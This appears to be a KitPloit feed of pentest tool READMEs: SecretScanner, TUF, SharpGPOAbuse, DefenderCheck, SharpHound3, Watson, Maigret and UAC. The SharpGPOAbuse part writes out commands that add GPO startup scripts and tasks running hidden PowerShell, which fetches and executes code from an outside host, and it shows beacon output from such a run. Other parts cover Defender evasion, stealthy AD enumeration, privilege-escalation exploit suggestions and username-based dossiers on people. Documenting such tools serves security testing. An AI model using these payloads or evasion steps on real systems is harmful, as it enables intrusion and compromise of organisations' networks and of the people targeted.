Channel: KitPloit - PenTest Tools!

SecretScanner - Find Secrets And Passwords In Container Images And File Systems



Deepfence SecretScanner can find any potential secrets in container images or file systems.


What are Secrets?

Secrets are any kind of sensitive or private data that gives authorized users access to critical IT infrastructure (such as accounts, devices, networks, and cloud-based services), applications, storage, databases, and other critical organizational data. Passwords, AWS access key IDs, AWS secret access keys, and Google OAuth keys are all examples of secrets. Secrets should be kept strictly private. However, attackers can sometimes access them easily due to flawed security policies or inadvertent developer mistakes. Developers sometimes use default secrets or leave hard-coded secrets such as passwords, API keys, encryption keys, SSH keys, and tokens in container images, especially during rapid development and deployment cycles in CI/CD pipelines. Users also sometimes store passwords in plain text. Leakage of secrets to unauthorized entities can put your organization and infrastructure at serious security risk.
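Detection of this kind is typically pattern-based. The sketch below illustrates the idea with two example regexes (the well-known AKIA prefix for AWS access key IDs, and a generic password assignment); SecretScanner's actual rules live in its config.yaml and are far more extensive:

```python
import re

# Illustrative patterns only -- SecretScanner's real rule set comes from
# its config.yaml (derived from the shhgit project) and is far larger.
PATTERNS = {
    "AWS Access Key ID": re.compile(r"AKIA[0-9A-Z]{16}"),
    "Generic password assignment": re.compile(r"password\s*=\s*\S+", re.IGNORECASE),
}

def scan_text(text):
    """Return (rule name, matched string) pairs for every pattern hit."""
    hits = []
    for name, pattern in PATTERNS.items():
        for match in pattern.finditer(text):
            hits.append((name, match.group(0)))
    return hits
```

A real scanner walks every layer of a container image and every file in a directory tree, applying rules like these to each file's contents.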

Deepfence SecretScanner helps users scan their container images or local directories on hosts and outputs a JSON file with details of all the secrets found.

Check out our blog for more details.


Command line options
$ ./SecretScanner --help

Usage of ./SecretScanner:
-config-path string
Searches for config.yaml in the given directory. If not set, tries to find it in the SecretScanner binary's directory and the current directory
-debug-level string
Debug levels are one of FATAL, ERROR, IMPORTANT, WARN, INFO, DEBUG. Only levels higher than the debug-level are displayed (default "ERROR")
-image-name string
Name of the image along with tag to scan for secrets
-json-filename string
Output json file name. If not set, it will automatically create a filename based on image or dir name
-local string
Specify the local directory (absolute path) to scan. Scans only the given directory, recursively.
-max-multi-match uint
Maximum number of matches of same pattern in one file. This is used only when multi-match option is enabled. (default 3)
-max-secrets uint
Maximum number of secrets to find in one container image or file system. (default 1000)
-maximum-file-size uint
Maximum file size to process in KB (default 256)
-multi-match
Output multiple matches of same pattern in one file. By default, only one match of a pattern is output for a file for better performance
-output-path string
Output directory where json file will be stored. If not set, it will output to current directory
-temp-directory string
Directory to process and store repositories/matches (default "/tmp")
-threads int
Number of concurrent threads (default number of logical CPUs)


Quickly Try Using Docker

Install Docker and run SecretScanner on a container image using the following instructions:

  • Build SecretScanner:

docker build --rm=true --tag=deepfenceio/secretscanning:latest -f Dockerfile .

  • Or, pull the latest build from docker hub by doing:

docker pull deepfenceio/secretscanning

  • Pull a container image for scanning:

docker pull node:8.11

  • Run SecretScanner:
    • Scan a container image:

      docker run -it --rm --name=deepfence-secretscanner -v $(pwd):/home/deepfence/output -v /var/run/docker.sock:/var/run/docker.sock -v /usr/bin/docker:/usr/bin/docker deepfenceio/secretscanning -image-name node:8.11
    • Scan a local directory:

      docker run -it --rm --name=deepfence-secretscanner -v $(pwd):/home/deepfence/output -v /var/run/docker.sock:/var/run/docker.sock -v /usr/bin/docker:/usr/bin/docker deepfenceio/secretscanning -local /home/deepfence/src/SecretScanner/test

By default, SecretScanner also writes JSON files with details of all the secrets found to the current working directory. You can explicitly specify the output directory and JSON filename using the appropriate options.
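As a rough illustration, a report like that can be post-processed with a few lines of Python. The field names below are assumptions for illustration only; check an actual SecretScanner JSON file for the real schema:

```python
import json

# Hypothetical report structure -- the field names here are assumptions,
# not SecretScanner's documented schema.
sample_report = json.loads("""
[
  {"Rule name": "AWS Access Key ID", "Full file name": "/app/.env", "Severity": "high"},
  {"Rule name": "Password in file", "Full file name": "/app/config.ini", "Severity": "medium"}
]
""")

def count_by_severity(findings):
    """Tally findings per severity so large reports can be triaged quickly."""
    counts = {}
    for finding in findings:
        sev = finding.get("Severity", "unknown")
        counts[sev] = counts.get(sev, 0) + 1
    return counts
```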


Build Instructions
  1. Install Docker
  2. Install Hyperscan
  3. Install go for your platform (version 1.14)
  4. Install go modules, if needed: gohs, yaml.v3 and color
  5. go get github.com/deepfence/SecretScanner will download and build SecretScanner automatically in $GOPATH/bin or $HOME/go/bin directory. Or, clone this repository and run go build -v -i to build the executable in the current directory.
  6. Edit config.yaml file as needed and run the secret scanner with the appropriate config file directory.

For reference, the Install file has the commands to build on an Ubuntu system.


Instructions to Run on Local Host
./SecretScanner --help

./SecretScanner -config-path /path/to/config.yaml/dir -local test

./SecretScanner -config-path /path/to/config.yaml/dir -image-name node:8.11

Sample SecretScanner Output



Credits

We have built upon the configuration file from shhgit project.


Disclaimer

This tool is not meant to be used for hacking. Please use it only for legitimate purposes like detecting secrets on the infrastructure you own, not on others' infrastructure. DEEPFENCE shall not be liable for loss of profit, loss of business, other financial loss, or any other loss or damage which may be caused, directly or indirectly, by the inadequacy of SecretScanner for any purpose or use thereof or by any defect or deficiency therein.




Tuf - A Framework For Securing Software Update Systems



This repository is the reference implementation of The Update Framework (TUF). It is written in Python and intended to conform to version 1.0 of the TUF specification. This implementation is in use in production systems, but is also intended to be a readable guide and demonstration for those working on implementing TUF in their own languages, environments, or update systems.


About The Update Framework

The Update Framework (TUF) design helps developers maintain the security of a software update system, even against attackers that compromise the repository or signing keys. TUF provides a flexible specification defining functionality that developers can use in any software update system or re-implement to fit their needs.
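A core idea in TUF is that clients accept metadata only when a threshold of trusted keys has signed it, so a single compromised key is not enough. The toy sketch below illustrates just the threshold logic, using HMAC as a stand-in for the real asymmetric signatures (e.g. ed25519 over canonical metadata) that TUF actually uses:

```python
import hashlib
import hmac

# Toy stand-in: HMAC-SHA256 plays the role of a signature scheme here.
# Real TUF metadata is signed with asymmetric keys, not shared secrets.
def sign(key: bytes, metadata: bytes) -> bytes:
    return hmac.new(key, metadata, hashlib.sha256).digest()

def threshold_verify(trusted_keys, signatures, metadata, threshold):
    """Accept metadata only if at least `threshold` trusted keys signed it."""
    valid = 0
    for keyid, key in trusted_keys.items():
        sig = signatures.get(keyid)
        if sig is not None and hmac.compare_digest(sig, sign(key, metadata)):
            valid += 1
    return valid >= threshold
```

With a threshold of 2 out of 3 root keys, an attacker who compromises one signing key still cannot forge acceptable metadata.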

TUF is hosted by the Linux Foundation as part of the Cloud Native Computing Foundation (CNCF) and its design is used in production by various tech companies and open source organizations. A variant of TUF called Uptane is used to secure over-the-air updates in automobiles.

Please see the TUF Introduction and TUF's website for more information about TUF!


Documentation

Contact

Please contact us via our mailing list. Questions, feedback, and suggestions are welcomed on this low-volume mailing list.

We strive to make the specification easy to implement, so if you come across any inconsistencies or experience any difficulty, do let us know by sending an email, or by reporting an issue in the GitHub specification repo.


Security Issues and Bugs

Security issues can be reported by emailing jcappos@nyu.edu.

At a minimum, the report must contain the following:

  • Description of the vulnerability.
  • Steps to reproduce the issue.

Optionally, emailed reports can be encrypted with PGP. Use the PGP key with fingerprint E9C0 59EC 0D32 64FA B35F 94AD 465B F9F6 F8EB 475A.

Please do not use the GitHub issue tracker to submit vulnerability reports. The issue tracker is intended for bug reports and to make feature requests. Major feature requests, such as design changes to the specification, should be proposed via a TUF Augmentation Proposal (TAP).


Limitations

The reference implementation may behave unexpectedly when concurrently downloading the same target files with the same TUF client.


License

This work is dual-licensed and distributed under the (1) MIT License and (2) Apache License, Version 2.0. Please see LICENSE-MIT and LICENSE.


Acknowledgements

This project is hosted by the Linux Foundation under the Cloud Native Computing Foundation. TUF's early development was managed by members of the Secure Systems Lab at New York University. We appreciate the efforts of Konstantin Andrianov, Geremy Condra, Vladimir Diaz, Yuyu Zheng, Sebastien Awwad, Santiago Torres-Arias, Trishank Kuppusamy, Zane Fisher, Pankhuri Goyal, Tian Tian, and Justin Samuel, who are among those who helped significantly with TUF's reference implementation. Contributors and maintainers are governed by the CNCF Community Code of Conduct.

This material is based upon work supported by the National Science Foundation under Grant Nos. CNS-1345049 and CNS-0959138. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the National Science Foundation.



SharpGPOAbuse - Tool To Take Advantage Of A User'S Edit Rights On A Group Policy Object (GPO) In Order To Compromise The Objects That Are Controlled By That GPO



SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse


Compile Instructions

Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.


Usage
Usage:
SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attack Options

Adding User Rights
Options required to add new user rights:
--UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separated list must be used.
--UserAccount
Set the account to which the new rights will be added.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

Adding a Local Admin
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added to the local admins group.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

Configuring a User or Computer Logon Script
Options required to add a new user or computer startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

Configuring a Computer or User Immediate Task
Options required to add a new computer or user immediate task:

--TaskName
Set the name of the new computer task.
--Author
Set the author of the new task (use a DA account).
--Command
Command to execute.
--Arguments
Arguments passed to the command.
--GPOName
The name of the vulnerable GPO.

Additional User Task Options:
--FilterEnabled
Enable Target Filtering for user immediate tasks.
--TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
The targeted user's SID.

Additional Computer Task Options:
--FilterEnabled
Enable Target Filtering for computer immediate tasks.
--TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.

Example:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com


Additional Options
--DomainController
Set the target domain controller.
--Domain
Set the target domain.
--Force
Overwrite existing files if required.

Example Output
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!


DefenderCheck - Identifies The Bytes That Microsoft Defender Flags On



Quick tool to help make evasion work a little bit easier.


Takes a binary as input and splits it until it pinpoints the exact byte that Microsoft Defender flags on, then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.
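The splitting strategy amounts to a binary search for the smallest prefix of the binary that still gets flagged. A minimal sketch, with `is_flagged` standing in for an actual Defender scan of a dropped file:

```python
# Stand-in signature and payload for demonstration; in reality Defender's
# verdict comes from scanning a file written to disk, not a substring test.
SIGNATURE = b"EVIL"
payload = b"A" * 100 + SIGNATURE + b"B" * 50

def is_flagged(data: bytes) -> bool:
    """Pretend scan: flag any data containing the signature."""
    return SIGNATURE in data

def find_flagged_offset(binary: bytes) -> int:
    """Binary-search for the smallest prefix length that still gets
    flagged; the last byte of that prefix is the offending offset."""
    lo, hi = 0, len(binary)
    while lo < hi:
        mid = (lo + hi) // 2
        if is_flagged(binary[:mid]):
            hi = mid          # a shorter prefix may still be flagged
        else:
            lo = mid + 1      # need more bytes to trigger detection
    return lo - 1
```

Once the offset is known, the surrounding bytes can be printed as a hex dump to show the offending code.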

Note: Defender must be enabled on your system, but the realtime protection and automatic sample submission features should be disabled.



SharpHound3 - C# Data Collector For The BloodHound Project



Get SharpHound

The latest build of SharpHound will always be in the BloodHound repository here


Compile Instructions

SharpHound is written using C# 9.0 features. To easily compile this project, use Visual Studio 2019.

If you would like to compile on previous versions of Visual Studio, you can install the Microsoft.Net.Compilers nuget package.

Building the project will generate an executable as well as a PowerShell script that encapsulates the executable. All dependencies are rolled into the binary.


Requirements

SharpHound is designed targeting .NET 4.5. SharpHound must be run from the context of a domain user, either directly through a logon or through another method such as RUNAS.


More Information

Usage

Enumeration Options
  • CollectionMethod - The collection method to use. This parameter accepts a comma separated list of values. Has the following potential values (Default: Default):
    • Default - Performs group membership collection, domain trust collection, local group collection, session collection, ACL collection, object property collection, and SPN target collection
    • Group - Performs group membership collection
    • LocalAdmin - Performs local admin collection
    • RDP - Performs Remote Desktop Users collection
    • DCOM - Performs Distributed COM Users collection
    • PSRemote - Performs Remote Management Users collection
    • GPOLocalGroup - Performs local admin collection using Group Policy Objects
    • Session - Performs session collection
    • ComputerOnly - Performs local admin, RDP, DCOM and session collection
    • LoggedOn - Performs privileged session collection (requires admin rights on target systems)
    • Trusts - Performs domain trust enumeration
    • ACL - Performs collection of ACLs
    • Container - Performs collection of Containers
    • DcOnly - Performs collection using LDAP only. Includes Group, Trusts, ACL, ObjectProps, Container, and GPOLocalGroup.
    • ObjectProps - Performs Object Properties collection for properties such as LastLogon or PwdLastSet
    • All - Performs all Collection Methods except GPOLocalGroup
  • Domain - Search a particular domain. Uses your current domain if null (Default: null)
  • Stealth - Performs stealth collection methods. All stealth options are single threaded.
  • ExcludeDomainControllers - Excludes domain controllers from enumeration (avoids Microsoft ATA flags :) )
  • ComputerFile - Specify a file to load computer names/IPs from
  • LdapFilter - LDAP filter to append to the search
  • OverrideUserName - Overrides user name for session enumeration (advanced)
  • RealDNSName - Overrides DNS name for API calls
  • CollectAllProperties - Collect all string LDAP properties instead of a subset
  • WindowsOnly - Limit computer collection to systems with an operating system that matches *Windows*

Loop Options
  • Loop - Loop computer collections
  • LoopDuration - How long to loop for
  • LoopInterval - Duration to wait between loops

Connection Options
  • DomainController - Specify which Domain Controller to connect to (Default: null)
  • LdapPort - Specify what port LDAP lives on (Default: 0)
  • SecureLdap - Connect to AD using Secure LDAP instead of regular LDAP. Will connect to port 636 by default.
  • LdapUsername - Username to connect to LDAP with. Requires the LDAPPassword parameter as well (Default: null)
  • LdapPassword - Password for the user to connect to LDAP with. Requires the LDAPUser parameter as well (Default: null)
  • DisableKerberosSigning - Disables LDAP encryption. Not recommended.

Performance Options
  • PortScanTimeout - Specifies the timeout for ping requests in milliseconds (Default: 2000)
  • SkipPortScan - Instructs Sharphound to skip ping requests to see if systems are up
  • Throttle - Adds a delay after each request to a computer. Value is in milliseconds (Default: 0)
  • Jitter - Adds a percentage of jitter to the throttle value (Default: 0)
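One plausible reading of how Throttle and Jitter combine (the exact formula is SharpHound's internal detail, so treat this as an illustration only):

```python
import random

def delay_ms(throttle_ms: int, jitter_percent: int, rng=random) -> float:
    """Assumed model: the base throttle delay is inflated by a random
    fraction of up to jitter_percent, so repeated requests don't form
    a perfectly regular (and detectable) cadence."""
    return throttle_ms * (1 + rng.uniform(0, jitter_percent / 100))
```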

Output Options
  • OutputDirectory - Folder in which to store JSON files (Default: .)
  • OutputPrefix - Prefix to add to your JSON files (Default: "")
  • NoZip - Don't compress JSON files to the zip file. Leaves JSON files on disk. (Default: false)
  • EncryptZip - Add a randomly generated password to the zip file.
  • ZipFileName - Specify the name of the zip file
  • RandomizeFilenames - Randomize output file names
  • PrettyJson - Outputs JSON with indentation on multiple lines to improve readability. Tradeoff is increased file size.
  • DumpComputerStatus - Dumps error codes from connecting to computers

Cache Options
  • CacheFileName - Filename for the Sharphound cache. (Default: .bin)
  • NoSaveCache - Don't save the cache file to disk. Without this flag, .bin will be dropped to disk
  • InvalidateCache - Invalidate the cache file and build a new cache

Misc Options
  • StatusInterval - Interval to display progress during enumeration in milliseconds (Default: 30000)


Watson - Enumerate Missing KBs And Suggest Exploits For Useful Privilege Escalation Vulnerabilities



Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
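Conceptually, the check boils down to comparing the installed KB list against a table of CVE-to-fixing-KB mappings: a CVE is reported when none of its fixing KBs is present. The KB numbers below are made up for illustration; Watson ships its own curated supersedence data:

```python
# Hypothetical supersedence table -- CVE-to-KB mappings here are
# placeholders, not Watson's real data.
FIXING_KBS = {
    "CVE-2019-0836": {"KB1111111", "KB2222222"},
    "CVE-2019-0841": {"KB1111111"},
}

def find_vulnerable(installed_kbs, fixing_kbs=FIXING_KBS):
    """Report every CVE for which no fixing KB is installed."""
    return sorted(cve for cve, kbs in fixing_kbs.items()
                  if not kbs & installed_kbs)
```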


Supported Versions
  • Windows 10 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004
  • Server 2016 & 2019

Usage
C:\> Watson.exe
__ __ _
/ / /\ \ \__ _| |_ ___ ___ _ __
\ \/ \/ / _` | __/ __|/ _ \| '_ \
\ /\ / (_| | |_\__ \ (_) | | | |
\/ \/ \__,_|\__|___/\___/|_| |_|

v2.0

@_RastaMouse

[*] OS Build Number: 14393
[*] Enumerating installed KBs...

[!] CVE-2019-0836 : VULNERABLE
[>] https://exploit-db.com/exploits/46718
[>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/

[!] CVE-2019-0841 : VULNERABLE
[>] https://github.com/rogue-kdc/CVE-2019-0841
[>] https://rastamouse.me/tags/cve-2019-0841/

[!] CVE-2019-1064 : VULNERABLE
[>] https://www.rythmstick.net/posts/cve-2019-1064/

[!] CVE-2019-1130 : VULNERABLE
[>] https://github.com/S3cur3Th1sSh1t/SharpByeBear

[!] CVE-2019-1253 : VULNERABLE
[>] https://github.com/padovah4ck/CVE-2019-1253

[!] CVE-2019-1315 : VULNERABLE
[>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html

[*] Finished. Found 6 potential vulnerabilities.

Issues
  • I try to update Watson after every Patch Tuesday, but for potential false positives check the latest supersedence information in the Windows Update Catalog. If you still think there's an error, raise an Issue with the Bug label.

  • If there's a particular vulnerability that you want to see in Watson that's not already included, raise an Issue with the Vulnerability Request label and include the CVE number.

  • If you know of a good exploit for any of the vulnerabilities in Watson, raise an Issue with the Exploit Suggestion label and provide a URL to the exploit.



Maigret - OSINT Username Checker. Collect A Dossier On A Person By Username From A Huge Number Of Sites



The Commissioner Jules Maigret is a fictional French police detective, created by Georges Simenon. His investigation method is based on understanding the personality of different people and their interactions.


About

The purpose of Maigret is to collect a dossier on a person by username alone, checking for accounts on a huge number of sites.

This is a Sherlock fork with cool features, under heavy development. Don't forget to regularly update the source code from the repo.

More than 2000 sites are currently supported (full list); by default, the search is launched against the 500 most popular sites in descending order of popularity.
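Conceptually, the default behavior can be sketched as sorting the site database by popularity and probing the top entries. The site names, URLs, and popularity values below are placeholders, not Maigret's real data:

```python
# Placeholder site database -- Maigret's real database has 2000+ entries.
SITES = [
    {"name": "SiteA", "url": "https://site-a.example/{username}", "popularity": 50},
    {"name": "SiteB", "url": "https://site-b.example/u/{username}", "popularity": 900},
    {"name": "SiteC", "url": "https://site-c.example/{username}", "popularity": 400},
]

def targets(username, sites=SITES, top=500):
    """Pick the `top` most popular sites and build the profile URLs to probe."""
    chosen = sorted(sites, key=lambda s: s["popularity"], reverse=True)[:top]
    return [s["url"].format(username=username) for s in chosen]
```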


Main features
  • Profile pages parsing, extracting personal info, links to other profiles, etc.
  • Recursive search by new usernames found
  • Search by tags (site categories, countries)
  • Censorship and captcha detection
  • Very few false positives

Installation

NOTE: Python 3.6 or higher and pip are required.

Python 3.8 is recommended.

# install from pypi
$ pip3 install maigret

# or clone and install manually
$ git clone https://github.com/soxoj/maigret && cd maigret
$ pip3 install .

Using examples
maigret user

# make HTML and PDF reports
maigret user --html --pdf

# search on sites marked with tags photo & dating
maigret user --tags photo,dating


# search for three usernames on all available sites
maigret user1 user2 user3 -a

Run maigret --help to get arguments description. Also options are documented in the Maigret Wiki.

With Docker:

docker build -t maigret .

docker run maigret user

Demo with page parsing and recursive username search

PDF report, HTML report



Full console output



UAC - Unix-like Artifacts Collector



UAC is a Live Response collection tool for Incident Response that uses built-in tools to automate the collection of artifacts from Unix-like systems. It respects the order of volatility and accounts for artifacts that are changed during execution. It was created to facilitate and speed up data collection, and to depend less on remote support during incident response engagements.

UAC can also be run against mounted forensic images. Please take a look at the conf/uac.conf file for more details.

You can use your own validated tools during artifact collection. They will be used instead of the built-in ones provided by the target system. Please refer to bin/README.txt for more information.


Supported Systems
  • AIX
  • BSD
  • Linux
  • macOS
  • Solaris

Collectors

Process (-p)

Collect information, calculate MD5 hash, and extract strings from running processes.


Network (-n)

Collect active network connections with related process information.


User (-u)

Collect user accounts information, login related files, and activities. The list of files and directories that will be collected can be found in the conf/user_files.conf file.


System (-y)

Collect system information, system configuration files, and kernel related details. The list of files and directories that will be collected can be found in the conf/system_files.conf file.


Hardware (-w)

Collect low-level hardware information.


Software (-s)

Collect information about installed packages and software.


Disk Volume and File System (-d)

Collect information about disks, volumes, and file systems.


Docker and Virtual Machine (-k)

Collect docker and virtual machines' information.


Body File (-b)

Extract information from files and directories using the stat or stat.pl tool to create a body file. The body file is an intermediate file used when creating a timeline of file activity. It is a pipe ("|") delimited text file that contains one line for each file. The Plaso or mactime tools can be used to read this file and sort its contents.
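For illustration, one body-file line in the TSK 3.x layout (MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime) can be built from os.stat like this; the mode field is simplified here to an octal number rather than the ls-style string real tools emit:

```python
import os

def body_line(path: str, md5: str = "0") -> str:
    """Build one body-file line for `path`.
    Field order: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime
    Timestamps are epoch seconds; crtime is left 0 since plain stat on
    most Unix-like systems does not expose creation time."""
    st = os.stat(path)
    fields = [md5, path, str(st.st_ino), oct(st.st_mode), str(st.st_uid),
              str(st.st_gid), str(st.st_size), str(int(st.st_atime)),
              str(int(st.st_mtime)), str(int(st.st_ctime)), "0"]
    return "|".join(fields)
```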


Logs (-l)

Collect log files and directories. The list of files and directories that will be collected can be found in the conf/logs.conf file.


Suspicious Files (-f)

Collect suspicious files and directories. The list of files and directories that will be collected can be found in the conf/suspicious_files.conf file.


Extensions

chkrootkit

Run the chkrootkit tool (if available). Note that the chkrootkit tool is not provided by UAC. You need to either have it available on the target system, or download and compile it and make its static binary available through the bin directory. Please refer to bin/README.txt for more information.


fls

Run the Sleuth Kit fls tool (if available) against all mounted block devices. Note that the fls tool is not provided by UAC. You need to either have it available on the target system, or download and compile it and make its static binary available through the bin directory. Please refer to bin/README.txt for more information.


hash_exec

Collect MD5 hashes for all executable files. By default, only files smaller than 3072000 bytes (3 MB) will be hashed. Please take a look at the extensions/hash_exec/hash_exec.conf file for more details. Warning: this extension will change the last accessed date of the touched files.


Profiles

One of the following profiles will be selected automatically according to the kernel name running on the current system. You can manually select one using the -P option though. This is useful when either UAC was not able to identify the correct profile for the current running system or when you are running UAC against a mounted forensic image.


aix

Use this profile to collect AIX artifacts.


bsd

Use this profile to collect BSD-based systems artifacts.
e.g. FreeBSD, NetBSD, OpenBSD, NetScaler...


linux

Use this profile to collect Linux-based systems artifacts.
*e.g. Debian, Red Hat, SuSE, Arch Linux, OpenWRT, QNAP QTS, Linux running on top of Windows (WSL)...


macos

Use this profile to collect macOS artifacts.


solaris

Use this profile to collect Solaris artifacts.


Options

Date Range (-R)

The range of dates to be used during the collection of logs, suspicious files, user files, and hashes of executable files. The date range is used to limit the amount of data collected by filtering files using find's -atime, -mtime or -ctime parameter. By default, UAC will search for files whose data was last modified (-mtime) OR whose status was last changed (-ctime) within the given date range. Please refer to conf/uac.conf for more details. The standard format is YYYY-MM-DD for a starting date with no ending date. For an ending date, use YYYY-MM-DD..YYYY-MM-DD.
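The default filter is equivalent to keeping a file when either its mtime or its ctime falls inside the range. A sketch of that logic:

```python
import os
from datetime import datetime

def in_date_range(path, start, end=None):
    """Keep a file if its data was last modified (mtime) OR its status
    was last changed (ctime) inside [start, end]; an open-ended range
    (no end date) extends to the present."""
    st = os.stat(path)
    end_ts = end.timestamp() if end else float("inf")
    for ts in (st.st_mtime, st.st_ctime):
        if start.timestamp() <= ts <= end_ts:
            return True
    return False
```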


Output File Transfer (-T)

Transfer the output file to a remote server using scp. The destination must be specified in the form [user@]host:[path]. It is recommended to use SSH key authentication in order to automate the transfer and avoid any password prompt during the process.


Debug (-D)

Increase debugging level.


Verbose (-V)

Increase verbosity level.


Run as non-root (-U)

Allow UAC to be run by a non-root user. Note that data collection will be limited.


Configuration Files

conf/uac.conf

The main UAC configuration file.


conf/logs.conf

Directory or file paths that will be searched and collected by the logs (-l) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/suspicious_files.conf

Directory or file paths that will be searched and collected by the suspicious files (-f) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/system_files.conf

Directory or file paths that will be searched and collected by the system files (-y) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/user_files.conf

Directory or file paths that will be searched and collected by the user files (-u) collector. If a directory path is added, all files and subdirectories will be collected automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -name option. Please check find man pages for instructions.


conf/exclude.conf

Directory or file paths that will be excluded from the collection. If a directory path is added, all files and subdirectories will be skipped automatically. The find command line tool will be used to search for files and directories, so the patterns added to this file need to be compatible with the -path and -name options. Please check the find man pages for instructions.


Usage
UAC (Unix-like Artifacts Collector)
Usage: ./uac COLLECTORS [-e EXTENSION_LIST] [-P PROFILE] [OPTIONS] [DESTINATION]

COLLECTORS:
-a Enable all collectors.
-p Collect information, calculate MD5 hash, and extract strings from running processes.
-n Collect active network connections with related process information.
-u Collect user accounts information, login related files, and activities.
-y Collect system information, system configuration files, and kernel related details.
-w Collect low-level hardware information.
-s Collect information about installed packages and software.
-d Collect information about disks, volumes, and file systems.
-k Collect docker and virtual machines information.
-b Extract information from files and directories using the stat tool to create a body file.
-l Collect log files and directories.
-f Collect suspicious files and directories.

EXTENSIONS:
-e EXTENSION_LIST
Comma-separated list of extensions.
all: Enable all extensions.
chkrootkit: Run chkrootkit tool.
fls: Run Sleuth Kit fls tool.
hash_exec: Hash executable files.

PROFILES:
-P PROFILE Force UAC to use a specific profile.
aix: Use this one to collect AIX artifacts.
bsd: Use this one to collect BSD-based systems artifacts.
linux: Use this one to collect Linux-based systems artifacts.
macos: Use this one to collect macOS artifacts.
solaris: Use this one to collect Solaris artifacts.

OPTIONS:
-R Starting date YYYY-MM-DD or range YYYY-MM-DD..YYYY-MM-DD
-T DESTINATION
Transfer output file to a remote server using scp.
The destination must be specified in the form [user@]host:[path]
-D Increase debugging level.
-V Increase verbosity level.
-U Allow UAC to be run by a non-root user. Note that data collection will be limited.
-v Print version number.
-h Print this help summary page.

DESTINATION:
Specify the directory the output will be saved to.
The default is the current directory.

Output

When UAC finishes, all collected data is compressed and the resulting file is stored in the destination directory. The compressed file is hashed (MD5) and the value is stored in a .md5 file.
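The hashing step can be sketched as follows; this is an illustration of the idea, not UAC's actual code, and the archive name and contents are stand-ins:

```python
# Hash the (stand-in) archive and store the digest in a sibling .md5 file,
# mirroring how UAC pairs its output archive with a hash file.
import hashlib

archive = "uac-output.tar.gz"  # hypothetical output file name
with open(archive, "wb") as f:
    f.write(b"stand-in for the real compressed archive")

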